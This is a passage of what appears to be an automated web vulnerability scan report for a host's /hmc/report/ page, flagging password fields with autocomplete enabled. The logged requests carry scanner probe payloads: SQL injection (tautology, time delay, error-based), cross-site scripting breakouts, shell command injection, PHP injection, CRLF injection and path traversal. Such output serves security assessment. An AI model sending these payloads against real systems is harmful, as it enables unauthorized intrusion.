Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:47 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:47 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=javascript:netsparker(0x00002e)" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.26. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%2BNSFTW%2B'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='%2BNSFTW%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%2BNSFTW%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.27. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000008%2529%253C%252Fscript%253E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000008%2529%253C%252Fscript%253E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000008%2529%253C%252Fscript%253E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.28. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='+OR+'1'%3d'1

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='+OR+'1'%3d'1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='+OR+'1'%3d'1" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.29. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.30. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=javascript:netsparker(0x000035)

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=javascript:netsparker(0x000035) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=javascript:netsparker(0x000035)" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.31. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.32. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.33. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.34. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error_log

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../etc/httpd/logs/error_log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error_log" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.35. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=NSFTW

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=NSFTW HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=NSFTW" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.36. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1;WAITFOR%20DELAY%20%270:0:25%27--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1;WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.37. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.38. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%26expr%20268409241%20-%202%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%26expr%20268409241%20-%202%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%26expr%20268409241%20-%202%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.39. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.40. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=1%20ns=netsparker(0x000017)%20

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt=1%20ns=netsparker(0x000017)%20 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=1%20ns=netsparker(0x000017)%20" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.41. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=;ns:expression(netsparker(0x000045));

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=;ns:expression(netsparker(0x000045)); HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=;ns:expression(netsparker(0x000045));" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.42. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
